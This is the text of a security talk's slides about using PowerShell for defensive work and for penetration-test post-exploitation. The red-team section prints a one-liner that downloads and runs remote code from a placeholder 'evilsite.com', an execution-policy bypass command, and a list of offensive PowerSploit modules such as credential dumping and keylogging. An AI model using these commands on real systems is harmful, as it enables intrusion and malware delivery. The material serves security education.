Who Should Use Powershell? You Should Use Powershell!

Who should use Powershell?

You should use Powershell!Ben Finke

@benfinke

A bit about me…

Ben Finke

@benfinke (if you’re in to that sort of thing)

▪ Security team at EI

▪ Love continuous learning

Red Teamer Blue Teamer

What brought me to Powershell

Standing on the Shoulders…

▪ Carlos Perez

▪ Matt Graeber

▪ Chris Campbell

▪ Matt Johnson

▪ Don Jones

▪ Lee Holmes

▪ Wolfgang Goerlich

▪ Rich Cassara

▪ Nick Jacob

▪ Ben Ten

▪ Ed Wilson

▪ Adam Driscoll

▪ And many, many more…..

I’m NOT saying…

Only use Powershell!!

I’m NOT saying…

My way or the highway

I AM saying…

Use Windows?

Powershell is great.

I AM saying…

New to scripting?

Powershell is great

I AM saying…

Pick the right tool for the right job.

Powershell – The Beginning

▪ Built into Windows!

▪ Better than Batch and cmd.exe

▪ Objects > Manipulating text output

▪ Powershell Remoting

▪ Did I mention its built into Windows?!

▪ Great documentation, code samples, communities

▪ Best tool for scripting and automating Windows

Levelset

▪ Cmdlet (pronounced like it sounds)

▪ Functions

▪ Scripts

▪ Modules

▪ Object

▪ Method vs Property

▪ Variable

Cmdlet

▪ Not misspelled – a feature!

▪ Powershell commands – implement specific functionality

▪ Verb-Noun pattern

▪ Microsoft and Third-Party cmdlets available

▪ Written in .Net (like C#)

▪ Get-Command

▪ Get-Help

So, where do I write my awesome code?

▪ Powershell ISE

▪ Notepad++

▪ Sublime Text Editor 2

▪ Primal Script ($)

▪ Visual Studio ($ or Community)

▪ You’re totally going to need a Windows computer though…

Powershell ISE

▪ Integrated Scripting Environment

▪ Tab Expansion

▪ Module Search

▪ Context based Help

▪ Demo!

Blue Team – Builder and Defender

Discovery

BaselineSystem

Hardening

Incident Response

Show Command Logging

Powershell Remoting

▪ Run that powershell script on a remote Windows system!

▪ Uses WinRM

Powershell Remoting – A word of caution

▪ Windows 2012 and newer – default w/ HTTP listener

▪ All others needs to be configured (once WMF is installed)

▪ Kerberos in AD, Basic and NTLM for workgroups

▪ Use HTTPS when available! (need a Windows CA)

▪ CredSSP is an option (especially if you like PtH Attacks)– That was a joke, you don’t.

▪ CredSSP for delegation and multi-hops

Discovery

Discovery

BaselineSystem

Hardening

Incident Response

Powershell Discovery

▪ Incorporate useful information from other tools– Nmap

– Nessus

▪ Pull info from AD directly– Windows 2008 R2 – 76 cmdlets in AD PS Module

– Windows 2012 – 135 cmdlets

– Windows 2012 R2 – 147 cmdlets

▪ Roll your own scanner with Powershell!

Baseline your stuff…

Discovery

BaselineSystem

Hardening

Incident Response

Baseline – Discovery, done repeatedly

▪ A lot of your discovery tasks will end up in your baseline

▪ Script up what you want to know

▪ Put it into some kind of usable text format

▪ Stash it in a versioning repository

▪ What changed between yesterday and today?

Automate Reporting

▪ Need to nicely present Nessus or nmap output?

▪ Previous work– Carlos Perez (DarkOperator) – Posh-NVS

▪ https://github.com/darkoperator/Posh-NVS

▪ Powershell easily handles XML and CSV inputs

[xml]$report = Get-Content –Raw .\scan.nessus

$reporthosts = $report.NessusClientData_v2.Report.ReportHost

$reporthosts | foreach {$_.ReportItem} | Out-GridView

Script out your ideal config…

Discovery

BaselineSystem

Hardening

Incident Response

System Hardening

▪ Use Powershell to – Enable windows firewall

– Enable windows update

– Disable Guest account

– Disable autoplay

– Install AV software

– Turn on User Account Control

– Disable Java in IE

What to do when weird things happen…

Discovery

BaselineSystem

Hardening

Incident Response

Incident Response

▪ Something bad (or maybe bad) is happening

▪ Identify source of unwanted activity

▪ Determine what is occurring

▪ Isolate and Contain

▪ Gather information from isolated system(s)

▪ After Action review

Build Your Own HoneyPot!

▪ Create cmdlet parameter binding

▪ Make sure you’re admin

▪ Build your whitelist

▪ Create a listening port

▪ Any connection – add source IP to firewall

▪ Log the action (for reporting and response)

PoshSec

▪ A Powershell module designed for executing security tasks on Windows systems

▪ Started by Will Steele and Matt Johnson

▪ Github – PoshSec

▪ Blue Team Focused

▪ Provides the platform for scripting and automating your playbook

PoshSec Framework

▪ A framework for Powershell and PoshSec scripts for network management, security, and maintenance

▪ Graphical Framework

PoshSec

▪ Critical Security Controls– (1) Inventory of Authorized and Unauthorized Devices

– (2) Inventory of Authorized and Unauthorized Software

– (11) Limitation and Control of Network Ports, Protocols, and Services

– (12) Controlled Use of Admin Privileges

– (16) Account Monitoring and Control

▪ Baselines

▪ Forensics

▪ Log Management

▪ Software Management

A few helpful hints

▪ Get a code repo – SVN/Git/TFS/whatever

▪ Centralized logging

▪ Prepare BEFORE the Incident

▪ Test your defenses

▪ Test your response

Red Team – Destroyer of Dreams

Attacker’s Advantage

“Attack him where he is unprepared, appear where you are not expected.”

-Sun Tzu

*Obligatory Art of War quote

So you’re on this pentest…

▪ You totally exploit that one thing.

▪ And then AV stops every. Single. Thing. You. Try.

▪ Time to Live off the Land!**

** Living off the Land – By Chris Campbell and Matt Graeber

Powershell as a Post Exploitation Tool

▪ Remember what we said about already on the system?

▪ Bypass AV and application whitelisting

▪ Control all aspects of a Windows system

▪ Easy to execute:

Invoke-Expression (New-Object Net.WebClient).DownloadString("http://evilsite.com/code.txt")

PowerSploit

▪ Github project - https://github.com/mattifestation/PowerSploit

▪ Started my Matt Graeber (@mattifestation)

▪ Powershell modules for pentesters

▪ Loads of PS goodness like:

• Invoke-Shellcode• Find-AVSignature• Invoke-TokenManipulation• Invoke-Mimikatz• Get-Keystrokes• Get-TimedScreenshot• Set-MasterBootRecord

• Set-CriticalProcess (BSoD)• Invoke-Portscan• Invoke-ReverseDnsLookup• Get-PEHeader• Get-DLLLoadPath• And lots, lots more!

“But wait!” you say…

Won’t the Execution Policy prevent our PS from running?

Not so much…

Powershell.exe –ExecutionPolicy Bypass evilscript.ps1

Seriously Bro, Powershell on a pentest?

▪ Yes, I am quite serious (and don’t call me Bro…)

▪ Ever hear of Deep Panda?– ProTip: Do NOT search for “Deep Panda” on Google Images.

▪ Deep Panda – the APT, not the 80s Metal Band

▪ Maintained persistence with Powershell scripts as scheduled tasks

▪ Moral of the story : Good enough for Deep Panda, good enough for you!

Whatever you are writing, please remember…

▪ Your code will be written once – and read dozens more.

▪ “accountName” is a way better variable than “a”

▪ Comments – use them!

▪ Think modular (or reusable)

▪ Error Catching

▪ Logging

▪ Documentation of your functions

▪ Code Repository

That’s it for me, you’ve been great!

If you enjoyed the talk, my name is Ben Finke.

If not, I’m Jess Hires (@hacksonville).

Thank you!